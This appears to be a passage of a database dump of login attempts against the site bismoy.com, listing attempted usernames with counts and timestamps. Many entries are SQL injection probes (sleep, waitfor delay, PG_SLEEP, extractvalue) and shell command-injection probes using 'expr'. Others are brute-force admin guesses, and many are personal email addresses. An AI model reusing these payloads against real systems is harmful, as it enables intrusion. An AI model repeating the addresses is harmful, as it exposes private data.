('2', 'admin\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'q\',0)=\'q', 1, '2023-10-19 04:32:39'),
('2', 'admin\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'r\',7)=\'r', 1, '2023-10-19 04:30:37'),
('2', 'admin\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'t\',0)=\'t', 1, '2023-10-19 04:30:36'),
('2', 'admin\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'w\',0)=\'w', 1, '2023-08-15 09:34:25'),
('2', 'admin\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'x\',0)=\'x', 1, '2023-10-19 04:16:13'),
('2', 'admin\'and\'a\'=\'a', 1, '2023-10-19 04:29:50'),
('2', 'admin\'and\'a\'=\'t', 1, '2023-10-19 04:33:08'),
('2', 'admin\'and\'b\'=\'w', 1, '2023-10-19 04:30:21'),
('2', 'admin\'and\'c\'=\'c', 1, '2023-10-19 04:15:07'),
('2', 'admin\'and\'d\'=\'c', 1, '2022-12-05 21:03:35'),
('2', 'admin\'and\'e\'=\'e', 1, '2023-10-19 04:32:27'),
('2', 'admin\'and\'g\'=\'g', 1, '2022-12-05 21:03:33'),
('2', 'admin\'and\'g\'=\'i', 1, '2023-10-19 04:32:28'),
('2', 'admin\'and\'h\'=\'w', 1, '2023-10-19 04:15:11'),
('2', 'admin\'and\'i\'=\'e', 1, '2023-08-15 09:32:28'),
('2', 'admin\'and\'t\'=\'y', 1, '2023-10-19 04:29:52'),
('2', 'admin\'and\'u\'=\'u', 1, '2023-10-19 04:33:05'),
('2', 'admin\'and\'x\'=\'x', 1, '2023-08-15 09:32:18'),
('2', 'admin\'and\'y\'=\'y', 1, '2023-10-19 04:30:19'),
('2', 'admin\'and(select\'1\'from/**/cast(md5(1215388307)as/**/int))>\'0', 1, '2023-08-15 09:31:17'),
('2', 'admin\'and(select\'1\'from/**/cast(md5(1395267391)as/**/int))>\'0', 1, '2023-10-19 04:28:44'),
('2', 'admin\'and(select\'1\'from/**/cast(md5(1611391518)as/**/int))>\'0', 1, '2023-10-19 04:32:27'),
('2', 'admin\'and(select\'1\'from/**/cast(md5(1704789316)as/**/int))>\'0', 1, '2023-10-19 04:30:18'),
('2', 'admin\'and(select\'1\'from/**/cast(md5(1793611423)as/**/int))>\'0', 1, '2023-10-19 04:15:20'),
('2', 'admin\'and(select\'1\'from/**/cast(md5(1912754093)as/**/int))>\'0', 1, '2022-12-05 21:04:22'),
('2', 'admin\'and(select\'1\'from/**/cast(md5(1941167564)as/**/int))>\'0', 1, '2023-10-19 04:33:36'),
('2', 'admin\'and(select*from(select+sleep(0))a/**/union/**/select+1)=\'', 7, '2023-10-19 04:33:22'),
('2', 'admin\'and(select*from(select+sleep(10))a/**/union/**/select+1)=\'', 1, '2023-10-19 04:32:32'),
('2', 'admin\'and(select*from(select+sleep(5))a/**/union/**/select+1)=\'', 1, '2023-10-19 04:15:42'),
('2', 'admin\'and(select*from(select+sleep(6))a/**/union/**/select+1)=\'', 3, '2023-10-19 04:33:25'),
('2', 'admin\'and(select*from(select+sleep(7))a/**/union/**/select+1)=\'', 2, '2023-10-19 04:30:27'),
('2', 'admin\'and(select+1)>0waitfor/**/delay\'0:0:0', 7, '2023-10-19 04:33:35'),
('2', 'admin\'and(select+1)>0waitfor/**/delay\'0:0:10', 1, '2023-10-19 04:32:37'),
('2', 'admin\'and(select+1)>0waitfor/**/delay\'0:0:5', 1, '2023-10-19 04:16:08'),
('2', 'admin\'and(select+1)>0waitfor/**/delay\'0:0:6', 3, '2023-10-19 04:33:38'),
('2', 'admin\'and(select+1)>0waitfor/**/delay\'0:0:7', 2, '2023-10-19 04:30:35'),
('2', 'admin\'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1101271234\')))>\'0', 1, '2023-10-19 04:30:23'),
('2', 'admin\'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1334331790\')))>\'0', 1, '2023-10-19 04:29:02'),
('2', 'admin\'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1484594442\')))>\'0', 1, '2023-10-19 04:15:33'),
('2', 'admin\'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1500362496\')))>\'0', 1, '2023-08-15 09:31:38'),
('2', 'admin\'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1692551357\')))>\'0', 1, '2023-10-19 04:33:41'),
('2', 'admin\'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1803260614\')))>\'0', 1, '2022-12-05 21:04:31'),
('2', 'admin\'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1903383724\')))>\'0', 1, '2023-10-19 04:32:30'),
('2', 'admin\'and/**/extractvalue(1,concat(char(126),md5(1289065047)))and\'', 1, '2023-10-19 04:33:29'),
('2', 'admin\'and/**/extractvalue(1,concat(char(126),md5(1664844446)))and\'', 1, '2022-12-05 21:04:12'),
('2', 'admin\'and/**/extractvalue(1,concat(char(126),md5(1674058769)))and\'', 1, '2023-08-15 09:30:59'),
('2', 'admin\'and/**/extractvalue(1,concat(char(126),md5(1718397752)))and\'', 1, '2023-10-19 04:32:23'),
('2', 'admin\'and/**/extractvalue(1,concat(char(126),md5(1850578510)))and\'', 1, '2023-10-19 04:15:06'),
('2', 'admin\'and/**/extractvalue(1,concat(char(126),md5(1878616703)))and\'', 1, '2023-10-19 04:28:30'),
('2', 'admin\'and/**/extractvalue(1,concat(char(126),md5(1938384317)))and\'', 1, '2023-10-19 04:30:13'),
('2', 'admin/**/and/**/cast(md5(\'1092050581\')as/**/int)>0', 1, '2022-12-05 21:04:25'),
('2', 'admin/**/and/**/cast(md5(\'1170879309\')as/**/int)>0', 1, '2023-10-19 04:30:20'),
('2', 'admin/**/and/**/cast(md5(\'1376445584\')as/**/int)>0', 1, '2023-10-19 04:28:50'),
('2', 'admin/**/and/**/cast(md5(\'1678212425\')as/**/int)>0', 1, '2023-10-19 04:15:25'),
('2', 'admin/**/and/**/cast(md5(\'1708549120\')as/**/int)>0', 1, '2023-10-19 04:32:28'),
('2', 'admin/**/and/**/cast(md5(\'1933485214\')as/**/int)>0', 1, '2023-08-15 09:31:23'),
('2', 'admin/**/and/**/cast(md5(\'1937338405\')as/**/int)>0', 1, '2023-10-19 04:33:37'),
('2', 'admin01', 11, '2024-10-08 03:34:43'),
('2', 'admin1', 16, '2026-02-27 14:42:26'),
('2', 'admin123', 11, '2024-10-08 03:30:31'),
('2', 'admin2', 12, '2024-10-08 02:55:45'),
('2', 'admin212', 11, '2024-10-08 02:57:26'),
('2', 'admin3', 11, '2024-10-08 03:29:07'),
('2', 'admin5', 11, '2024-10-08 03:04:32'),
('2', 'admin82', 1, '2022-04-07 16:08:13'),
('2', 'admin@admin.com', 1, '2026-02-27 14:30:01'),
('2', 'admin@bismoy.com', 49, '2026-02-15 23:36:47'),
('2', 'adminbackup', 11, '2024-10-08 02:58:18'),
('2', 'adminer', 11, '2024-10-08 03:00:33'),
('2', 'administrator', 71, '2025-12-12 08:25:17'),
('2', 'adminnew', 11, '2024-10-08 03:03:59'),
('2', 'adminray', 11, '2024-10-08 03:04:15'),
('2', 'admins', 11, '2024-10-08 03:00:16'),
('2', 'adminu', 11, '2024-10-08 03:03:41'),
('2', 'adminusername', 11, '2024-10-08 02:58:52'),
('2', 'adminweb', 11, '2024-10-08 03:01:08'),
('2', 'admin_backup', 11, '2024-10-08 03:01:25'),
('2', 'admin_user', 11, '2024-10-08 03:03:07'),
('2', 'admin|expr 803098292 + 992256173 ', 1, '2023-10-19 04:32:59'),
('2', 'admin|expr 834776897 + 805016160 ', 1, '2023-10-19 04:15:16'),
('2', 'admin|expr 850970397 + 819346924 ', 1, '2023-10-19 04:29:09'),
('2', 'admin|expr 940739382 + 893537970 ', 1, '2023-08-15 09:30:47'),
('2', 'admin|expr 952877470 + 840959969 ', 1, '2022-12-05 21:03:51'),
('2', 'admin|expr 964430659 + 906097933 ', 1, '2023-10-19 04:32:18'),
('2', 'admin|expr 982290309 + 929536849 ', 1, '2023-10-19 04:29:39'),
('2', 'admin鎈\'\"\\(', 7, '2023-10-19 04:33:42'),
('2', 'adtube', 11, '2024-10-08 03:29:41'),
('2', 'afridi', 1, '2021-04-13 04:43:48'),
('2', 'afterpay', 11, '2024-10-08 03:21:34'),
('2', 'aguy', 11, '2024-10-08 03:22:58'),
('2', 'aICBKM9D\' OR 158=(SELECT 158 FROM PG_SLEEP(15))--', 1, '2023-08-12 11:12:52'),
('2', 'ajudaica', 11, '2024-10-08 03:32:12'),
('2', 'aktar', 3, '2025-12-12 08:25:09'),
('2', 'aktar@bismoy.com', 2, '2025-12-12 08:25:12'),
('2', 'ALEsMe.hqbmtdb@monochord.xyz', 1, '2023-11-24 01:23:32'),
('2', 'alex', 1, '2022-08-25 21:21:37'),
('2', 'alexander', 1, '2023-04-06 14:37:28'),
('2', 'alileasm@gmail.com', 6, '2024-09-28 19:22:34'),
('2', 'Aljudmilaodonnaab2943@gmail.com', 12, '2022-05-06 18:27:26'),
('2', 'amasty', 2, '2024-08-26 07:53:23'),
('2', 'amertcawrey@yahoo.com', 3, '2024-10-30 03:28:44'),
('2', 'analytics', 11, '2024-10-08 03:12:04'),
('2', 'andrew', 1, '2023-03-23 02:12:30'),
('2', 'angelajha63@gmail.com', 2, '2022-03-14 05:33:56'),
('2', 'anthony', 1, '2023-03-20 07:03:53'),
('2', 'ARogers', 11, '2024-10-08 03:26:19'),
('2', 'asp_admin', 11, '2024-10-08 03:29:24'),
('2', 'athenabsafd81@gmail.com', 2, '2021-10-27 14:01:41'),
('2', 'autoupdate', 11, '2024-10-08 03:02:50'),
('2', 'B0VzJ9OL\')) OR 171=(SELECT 171 FROM PG_SLEEP(15))--', 1, '2023-08-12 13:31:43'),
('2', 'Backup', 11, '2024-10-08 03:04:48'),
('2', 'backup_temp', 11, '2024-10-08 03:22:08'),
('2', 'backup_user', 11, '2024-10-08 03:09:00'),
('2', 'backup__', 11, '2024-10-08 03:16:50'),
('2', 'baileyknight902@gmail.com', 11, '2022-02-24 23:22:00'),
('2', 'be.n.ni.e.chavez.6.1.86@gmail.com', 1, '2025-09-18 21:39:53'),
('2', 'BeatriceSutton385583@gmail.com', 12, '2021-12-03 10:02:00'),
('2', 'benjamin', 1, '2023-04-04 20:20:01'),
('2', 'bigcommerce', 11, '2024-10-08 03:13:12'),
('2', 'bis', 1, '2023-02-17 01:03:57'),
('2', 'bismoy', 1077, '2026-02-14 09:28:39'),
('2', 'bismoy.com', 59, '2024-06-18 09:16:52'),
('2', 'bismoy@bismoy.com', 10, '2022-12-19 05:34:42'),
('2', 'bismoy@gmail.com', 6, '2025-04-03 04:31:57'),
('2', 'bismoy@yahoo.com', 1, '2022-09-22 04:46:39'),
('2', 'bismoyadmin', 158, '2026-01-24 07:02:59'),
('2', 'bismoycom', 56, '2024-06-18 09:18:27'),
('2', 'bismoylogin', 31, '2024-06-18 09:13:21'),
('2', 'bKvXhd.btbbbth@purline.top', 1, '2023-12-31 13:54:32'),
('2', 'blairdaniella5@gmail.com', 2, '2021-11-22 09:54:09'),
('2', 'BokIrL.bmpbhtp@lustrum.cfd', 1, '2024-01-01 21:04:07'),
('2', 'BotIOD.pmqjmtd@kerfuffle.asia', 1, '2024-03-06 08:37:17'),
('2', 'brandon', 1, '2023-04-04 06:12:36'),
('2', 'brent', 11, '2024-10-08 03:19:04'),
('2', 'brian', 12, '2024-10-08 03:41:26'),
('2', 'brother', 65, '2024-10-08 02:54:03'),
('2', 'bVWipU.ddpmmtp@paravane.biz', 1, '2023-12-01 00:22:21'),
('2', 'c.ahu.wu.zog.a.w0.4@gmail.com', 1, '2026-04-28 00:12:35'),
('2', 'C7o3WuO4\')) OR 770=(SELECT 770 FROM PG_SLEEP(15))--', 1, '2023-08-12 11:23:56'),
('2', 'c7xvaw2o\') OR 790=(SELECT 790 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:58:34'),
('2', 'ca.b.u.d.a.fa.d.u.m5.9.9@gmail.com', 2, '2026-02-02 11:22:09'),
('2', 'cava2563@gmail.com', 12, '2021-12-31 16:41:00'),
('2', 'cazJUD.wbwhddq@usufruct.bar', 1, '2023-12-13 18:55:41'),
('2', 'cbd_admin', 11, '2024-10-08 03:25:45'),
('2', 'cdkLEo.ttdqjjj@flexduck.click', 1, '2024-02-16 23:27:44'),
('2', 'charles', 1, '2023-03-18 01:17:00'),
('2', 'chicago', 11, '2024-10-08 03:42:00'),
('2', 'chris', 12, '2026-02-27 14:42:27'),
('2', 'christopher', 1, '2023-03-18 14:42:21'),
('2', 'cinarmuge650@gmail.com', 12, '2022-04-23 00:05:41'),
('2', 'cLUyyCyD\'; waitfor delay \'0:0:15\' -- ', 1, '2023-08-12 08:34:50'),
('2', 'cmseditor', 11, '2024-10-08 03:37:14'),
('2', 'cn1', 2, '2022-08-24 07:03:58'),
('2', 'cnaaron', 1, '2023-04-11 09:48:27'),
('2', 'cnadmin', 321, '2023-09-08 03:16:25'),
('2', 'cnadmin@bismoy.com', 38, '2023-07-05 20:29:42'),
('2', 'cnadministrator', 2, '2022-08-25 01:55:24'),
('2', 'cnalex', 1, '2022-08-25 21:21:25'),
('2', 'cnalexander', 1, '2023-04-06 14:37:15'),
('2', 'cnandrew', 1, '2023-03-23 02:12:18'),
('2', 'cnanthony', 1, '2023-03-20 07:03:42'),
('2', 'cnbenjamin', 1, '2023-04-04 20:19:49'),
('2', 'cnbis', 1, '2023-02-17 01:03:45'),
('2', 'cnbismoy', 110, '2023-09-03 09:36:33'),
('2', 'cnbismoy.com', 3, '2023-06-08 12:32:51'),
('2', 'cnbismoy@bismoy.com', 10, '2022-12-19 05:34:29'),
('2', 'cnbismoy@gmail.com', 5, '2022-09-15 22:20:25'),
('2', 'cnbismoy@yahoo.com', 1, '2022-09-22 04:46:26'),
('2', 'cnbrandon', 1, '2023-04-04 06:12:25'),
('2', 'cnbrian', 1, '2023-03-25 08:13:21'),
('2', 'cncharles', 1, '2023-03-18 01:16:46'),
('2', 'cnchristopher', 1, '2023-03-18 14:42:08'),
('2', 'cndaniel', 1, '2023-03-19 04:04:02'),
('2', 'cndavid', 1, '2023-03-15 06:06:18'),
('2', 'cndemo', 1, '2022-04-01 10:30:35'),
('2', 'cndennis', 1, '2023-04-09 13:37:24'),
('2', 'cndonald', 1, '2023-03-21 09:58:47'),
('2', 'cndouglas', 1, '2023-04-14 09:19:23'),
('2', 'cneditor', 4, '2022-08-20 01:50:35'),
('2', 'cnedward', 1, '2023-03-27 15:04:00'),
('2', 'cneric', 1, '2023-03-31 17:53:14'),
('2', 'cnethan', 1, '2023-04-16 15:26:20'),
('2', 'cnfrank', 1, '2023-04-07 04:53:03'),
('2', 'cngary', 1, '2023-03-30 13:25:46'),
('2', 'cngeorge', 1, '2023-03-25 21:33:08'),
('2', 'cngregory', 1, '2023-04-06 00:22:20'),
('2', 'cnhenry', 1, '2023-04-13 19:56:02'),
('2', 'cnjack', 1, '2023-04-08 23:26:23'),
('2', 'cnjacob', 2, '2023-03-29 23:01:27'),
('2', 'cnjason', 1, '2023-03-28 04:42:41'),
('2', 'cnjeffrey', 1, '2023-03-28 18:30:49'),
('2', 'cnjerry', 1, '2023-04-10 04:05:11'),
('2', 'cnjohn', 1, '2023-03-14 03:19:08'),
('2', 'cnjonathan', 1, '2023-04-01 08:04:32'),
('2', 'cnjose', 1, '2023-04-12 00:52:43'),
('2', 'cnjoseph', 1, '2023-03-16 22:16:33'),
('2', 'cnjoshua', 1, '2023-03-23 15:44:50'),
('2', 'cnjustin', 1, '2023-04-03 01:54:56'),
('2', 'cnkenneth', 1, '2023-03-24 05:14:05'),
('2', 'cnkevin', 1, '2023-03-24 18:47:19'),
('2', 'cnkyle', 1, '2023-04-16 01:36:31'),
('2', 'cnlarry', 1, '2023-04-02 11:57:43'),
('2', 'cnmark', 1, '2023-03-20 20:31:03'),
('2', 'cnmatthew', 1, '2023-03-19 17:32:00'),
('2', 'cnmichael', 1, '2023-03-14 16:45:58'),
('2', 'cnmichel', 1, '2022-08-27 13:53:01'),
('2', 'cnmoy', 1, '2023-02-17 01:03:45'),
('2', 'cnnathan', 1, '2023-04-13 06:11:42'),
('2', 'cnnicholas', 1, '2023-03-31 03:47:10'),
('2', 'cnnoah', 1, '2023-04-17 19:08:25'),
('2', 'cnpatrick', 1, '2023-04-07 19:07:38'),
('2', 'cnpaul', 1, '2023-03-22 12:44:48'),
('2', 'cnpeter', 1, '2023-04-15 12:02:06'),
('2', 'cnraymond', 1, '2023-04-08 09:13:33'),
('2', 'cnrichard', 1, '2023-03-16 08:56:21'),
('2', 'cnrobert', 1, '2023-03-13 13:50:21'),
('2', 'cnronald', 1, '2023-03-27 01:08:59'),
('2', 'cnroot', 1, '2022-12-24 20:18:36'),
('2', 'cnryan', 1, '2023-03-29 08:37:44'),
('2', 'cnsamuel', 1, '2023-04-05 10:16:48'),
('2', 'cnscott', 1, '2023-04-03 16:00:37'),
('2', 'cnseo', 1, '2022-12-24 17:21:23'),
('2', 'cnsteven', 1, '2023-03-21 23:19:20'),
('2', 'cntest', 6, '2023-03-12 13:53:09'),
('2', 'cnthomas', 1, '2023-03-17 11:41:43'),
('2', 'cntimothy', 1, '2023-03-26 11:07:46'),
('2', 'cntyler', 1, '2023-04-10 18:47:34'),
('2', 'cnwalter', 1, '2023-04-17 05:19:32'),
('2', 'cnwilliam', 1, '2023-03-15 19:35:20'),
('2', 'cnzachary', 1, '2023-04-14 22:37:52'),
('2', 'cofcgirl101@yahoo.com', 4, '2024-10-01 09:49:16'),
('2', 'control', 11, '2024-10-08 03:09:17'),
('2', 'convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1102159346\')))', 1, '2022-12-05 21:04:27'),
('2', 'convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1302826920\')))', 1, '2023-10-19 04:28:54'),
('2', 'convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1366499659\')))', 1, '2023-10-19 04:15:29'),
('2', 'convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1430694995\')))', 1, '2023-10-19 04:33:39'),
('2', 'convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1460754143\')))', 1, '2023-10-19 04:32:29'),
('2', 'convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1506180464\')))', 1, '2023-08-15 09:31:32'),
('2', 'convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'1827672472\')))', 1, '2023-10-19 04:30:21'),
('2', 'coree9519mdj57i72y@outlook.com', 2, '2022-09-04 23:27:05'),
('2', 'coropesa', 11, '2024-10-08 03:27:09'),
('2', 'CPSiFD.mdtqdd@chiffon.fun', 1, '2024-02-05 02:47:47'),
('2', 'CpUap2JZ\') OR 539=(SELECT 539 FROM PG_SLEEP(15))--', 1, '2023-08-12 13:31:41'),
('2', 'csmadmin', 11, '2024-10-08 02:56:18'),
('2', 'Customer', 11, '2024-10-08 03:18:31'),
('2', 'customer1', 11, '2024-10-08 03:19:38'),
('2', 'cWvQjC.pwbchbq@rushlight.cfd', 1, '2024-02-24 22:49:32'),
('2', 'daniel', 1, '2023-03-19 04:04:13'),
('2', 'davenportmayo278905@gmail.com', 8, '2022-01-22 07:32:07'),
('2', 'daveonb3l380b4j79@outlook.com', 18, '2022-08-28 04:35:28'),
('2', 'david', 1, '2023-03-15 06:06:31'),
('2', 'dc9fywBP\'; waitfor delay \'0:0:15\' -- ', 1, '2023-08-12 12:43:38'),
('2', 'defadm1n', 11, '2024-10-08 03:22:24'),
('2', 'defadmin', 11, '2024-10-08 03:22:41'),
('2', 'default', 11, '2024-10-08 03:24:55'),
('2', 'defaults', 11, '2024-10-08 03:24:38'),
('2', 'demo', 3, '2026-02-19 23:05:44'),
('2', 'demoadmin', 11, '2024-10-08 03:08:26'),
('2', 'dennis', 1, '2023-04-09 13:37:36'),
('2', 'design', 11, '2024-10-08 03:02:33'),
('2', 'designcoil', 11, '2024-10-08 03:34:09'),
('2', 'dev', 807, '2026-02-25 09:07:28'),
('2', 'developer', 886, '2026-02-25 04:25:28'),
('2', 'devsupm', 69, '2024-10-08 02:53:47'),
('2', 'devuser', 11, '2024-10-08 03:23:14'),
('2', 'dexmage', 11, '2024-10-08 03:02:00'),
('2', 'DjWKXB.btbbbcw@purline.top', 1, '2023-12-31 13:54:37'),
('2', 'dkumiko461k0d5@outlook.com', 18, '2022-07-30 13:17:30'),
('2', 'DmhTmw.bqbqqp@chiffon.fun', 1, '2024-01-27 10:54:49'),
('2', 'dmoned651upqz@outlook.com', 2, '2022-08-14 02:31:52'),
('2', 'DNZiX2mW\')) OR 23=(SELECT 23 FROM PG_SLEEP(15))--', 1, '2023-08-12 11:13:04'),
('2', 'donald', 12, '2024-10-08 03:06:29'),
('2', 'doris_nugentmeds@outlook.com', 5, '2024-09-17 12:19:45'),
('2', 'douglas', 1, '2023-04-14 09:19:34'),
('2', 'DsVMGajy\'; waitfor delay \'0:0:15\' -- ', 1, '2023-08-12 13:31:38'),
('2', 'e.ko.y.ijavux.uk2.8@gmail.com', 1, '2026-04-30 04:10:29'),
('2', 'eboundhost', 11, '2024-10-08 03:15:10'),
('2', 'ecommerce', 22, '2024-10-08 03:13:46'),
('2', 'Ecosque', 1, '2023-05-13 11:41:48'),
('2', 'edenton', 11, '2024-10-08 03:23:48'),
('2', 'editor', 6, '2025-03-29 21:18:07'),
('2', 'edward', 1, '2023-03-27 15:04:12'),
('2', 'em.u.vo.s.esexu.k58@gmail.com', 1, '2026-03-10 06:53:25'),
('2', 'eqoErnKU\' OR 111=(SELECT 111 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:27:02'),
('2', 'eric', 12, '2024-10-08 03:40:53'),
('2', 'ethan', 1, '2023-04-16 15:26:33'),
('2', 'etjnxiqj@testform.xyz', 1, '2025-09-25 23:39:17'),
('2', 'expr 854225492 + 989053240', 1, '2023-10-19 04:32:23'),
('2', 'expr 859102607 + 826229785', 1, '2023-10-19 04:15:31'),
('2', 'expr 864982632 + 858073518', 1, '2022-12-05 21:03:56'),
('2', 'expr 877343536 + 806412522', 1, '2023-10-19 04:29:49'),
('2', 'expr 885340741 + 894547973', 1, '2023-08-15 09:31:02'),
('2', 'expr 982557887 + 822464771', 1, '2023-10-19 04:33:13'),
('2', 'expr 994138090 + 800652773', 1, '2023-10-19 04:29:28'),
('2', 'ExtlrJ.dcwmjc@sabletree.foundation', 1, '2024-02-02 05:46:46'),
('2', 'extractvalue(1,concat(char(126),md5(1383412865)))', 1, '2022-12-05 21:04:20'),
('2', 'extractvalue(1,concat(char(126),md5(1541112439)))', 1, '2023-10-19 04:30:16'),
('2', 'extractvalue(1,concat(char(126),md5(1553898616)))', 1, '2023-10-19 04:28:40'),
('2', 'extractvalue(1,concat(char(126),md5(1557527102)))', 1, '2023-10-19 04:33:34'),
('2', 'extractvalue(1,concat(char(126),md5(1731723656)))', 1, '2023-08-15 09:31:10'),
('2', 'extractvalue(1,concat(char(126),md5(1765728712)))', 1, '2023-10-19 04:15:15'),
('2', 'extractvalue(1,concat(char(126),md5(1867743197)))', 1, '2023-10-19 04:32:26'),
('2', 'fastmage', 11, '2024-10-08 03:02:17'),
('2', 'fDYOcI.mhqwbb@virilia.life', 1, '2023-12-02 06:52:09'),
('2', 'FeyegKhc\'; waitfor delay \'0:0:15\' -- ', 1, '2025-03-08 11:53:33'),
('2', 'FHIRkaRT\' OR 174=(SELECT 174 FROM PG_SLEEP(15))--', 1, '2023-08-12 12:43:41'),
('2', 'fi.yi.v.e.cu.65@gmail.com', 1, '2026-01-08 10:41:07'),
('2', 'fittsdot@gmail.com', 12, '2021-06-27 11:45:07'),
('2', 'foleylane554743@gmail.com', 6, '2022-01-23 09:18:09'),
('2', 'forme', 11, '2024-10-08 02:59:26'),
('2', 'formez', 11, '2024-10-08 03:08:10'),
('2', 'frank', 1, '2023-04-07 04:53:16'),
('2', 'fredy', 11, '2024-10-08 03:42:34'),
('2', 'fusion', 11, '2024-10-08 03:21:17'),
('2', 'fXvbsl.hqbmtwd@monochord.xyz', 1, '2023-11-24 01:23:40'),
('2', 'g.o.q.uqu.y.447@gmail.com', 3, '2026-04-30 22:08:21'),
('2', 'g1U6DR1p\')) OR 471=(SELECT 471 FROM PG_SLEEP(15))--', 1, '2023-08-12 14:00:01'),
('2', 'gary', 1, '2023-03-30 13:25:58'),
('2', 'GaryMiller4A@gmail.com', 12, '2021-11-20 19:01:44'),
('2', 'gejyxjsxtacaraphillips@gmail.com', 5, '2022-04-03 02:37:12'),
('2', 'george', 1, '2023-03-25 21:33:19'),
('2', 'Georgegrarl', 1, '2022-09-03 20:10:02'),
('2', 'gijrrzkv@testform.xyz', 1, '2025-07-14 18:57:23'),
('2', 'glades', 11, '2024-10-08 03:07:36'),
('2', 'google', 11, '2024-10-08 02:57:42'),
('2', 'gordonb95@yahoo.com', 1, '2026-03-29 05:57:29'),
('2', 'grace', 11, '2024-10-08 03:28:16'),
('2', 'grace1234', 11, '2024-10-08 03:28:33'),
('2', 'gregory', 1, '2023-04-06 00:22:32'),
('2', 'gsheika728i8f6go4o@outlook.com', 18, '2022-07-29 22:56:46'),
('2', 'guest', 11, '2024-10-08 03:33:35'),
('2', 'guestss', 11, '2024-10-08 03:35:50'),
('2', 'Gzm27c0f\' OR 979=(SELECT 979 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:54:11'),
('2', 'h.o.fa.f.u.p.a.r.7.8@gmail.com', 1, '2026-03-12 21:18:15'),
('2', 'h1', 3, '2022-02-08 15:22:38'),
('2', 'haelliott7@gmail.com', 12, '2022-01-12 14:43:11'),
('2', 'henrrycleoo102@gmail.com', 12, '2022-05-14 01:55:27'),
('2', 'henry', 1, '2023-04-13 19:56:16'),
('2', 'hghyggyu@gmail.com', 2, '2022-04-10 13:10:42'),
('2', 'hHieyQ.pwqwtpj@usufruct.bar', 1, '2023-12-10 12:24:24'),
('2', 'holli', 11, '2024-10-08 03:25:28'),
('2', 'hru1@kirzzioh.store\r\n', 1, '2025-01-21 22:45:37'),
('2', 'huffharper', 11, '2024-10-08 03:24:21'),
('2', 'hugolehmann92@outlook.com', 1, '2026-03-29 05:57:21'),
('2', 'hv4M9oot\')) OR 326=(SELECT 326 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:28:25'),
('2', 'hxtddhwn@checkyourform.xyz', 1, '2026-03-14 21:15:57'),
('2', 'hydra', 11, '2024-10-08 02:58:00'),
('2', 'i.dib.uq.uf.i.y.i.27.2@gmail.com', 1, '2026-02-05 11:10:02'),
('2', 'i.g.ut.e.liva8.2@gmail.com', 1, '2026-03-28 09:02:42'),
('2', 'I97CbomR\') OR 230=(SELECT 230 FROM PG_SLEEP(15))--', 1, '2025-03-08 12:10:02'),
('2', 'ib.ih.as.eq.aj.e.0.6.7@gmail.com', 1, '2026-01-07 23:05:20'),
('2', 'icasuyog457@gmail.com', 4, '2025-11-18 02:29:27'),
('2', 'if(now()=sysdate(),sleep(15),0)', 14, '2025-03-08 12:01:25'),
('2', 'ihE4MjVa\') OR 587=(SELECT 587 FROM PG_SLEEP(15))--', 1, '2023-08-12 08:34:58'),
('2', 'impecca', 11, '2024-10-08 03:27:26'),
('2', 'info', 11, '2024-10-08 03:33:02'),
('2', 'info@bismoy.com', 4, '2026-02-24 10:44:41'),
('2', 'iqe.c.i.ya.li.k.o80.6@gmail.com', 1, '2026-01-11 16:06:14'),
('2', 'iqolube253@gmail.com', 1, '2025-12-29 04:48:14'),
('2', 'isiboqaf571@gmail.com', 4, '2025-11-01 13:46:42'),
('2', 'isobel72@hotmail.com', 1, '2026-02-17 14:15:29'),
('2', 'IVWjVA.cjppjw@rottack.autos', 1, '2023-11-10 10:35:07'),
('2', 'ixpa', 11, '2024-10-08 03:42:17'),
('2', 'IxXFORUQ\' OR 250=(SELECT 250 FROM PG_SLEEP(15))--', 1, '2023-08-12 11:31:55'),
('2', 'iyvhyewz@testform.xyz', 1, '2025-05-27 12:24:36'),
('2', 'j.id.a.xukas.as.1.15@gmail.com', 7, '2026-02-27 06:08:42'),
('2', 'jack', 1, '2023-04-08 23:26:36'),
('2', 'jacob', 2, '2023-03-29 23:01:39'),
('2', 'jashwill', 11, '2024-10-08 03:28:00'),
('2', 'jason', 12, '2024-10-08 03:40:19'),
('2', 'jb5474452@gmail.com', 12, '2021-06-12 03:04:45'),
('2', 'JBDfWlq4\') OR 20=(SELECT 20 FROM PG_SLEEP(15))--', 1, '2023-08-12 11:31:56'),
('2', 'jBMeOAPb\'; waitfor delay \'0:0:15\' -- ', 1, '2023-08-12 11:31:55'),
('2', 'JC7phV68\' OR 241=(SELECT 241 FROM PG_SLEEP(15))--', 1, '2023-08-12 11:23:50'),
('2', 'jeffrey', 1, '2023-03-28 18:31:00'),
('2', 'jerry', 1, '2023-04-10 04:05:23'),
('2', 'JIephrcG\'; waitfor delay \'0:0:15\' -- ', 1, '2025-03-08 11:26:22'),
('2', 'jn2a5G7M\'; waitfor delay \'0:0:15\' -- ', 1, '2023-08-12 13:59:29'),
('2', 'john', 127, '2026-01-24 07:03:28'),
('2', 'jonathan', 1, '2023-04-01 08:04:44'),
('2', 'jose', 1, '2023-04-12 00:52:57'),
('2', 'joseph', 1, '2023-03-16 22:16:44'),
('2', 'Josepharold', 1, '2023-10-10 21:26:11'),
('2', 'Josephlek', 1, '2025-03-09 21:00:32'),
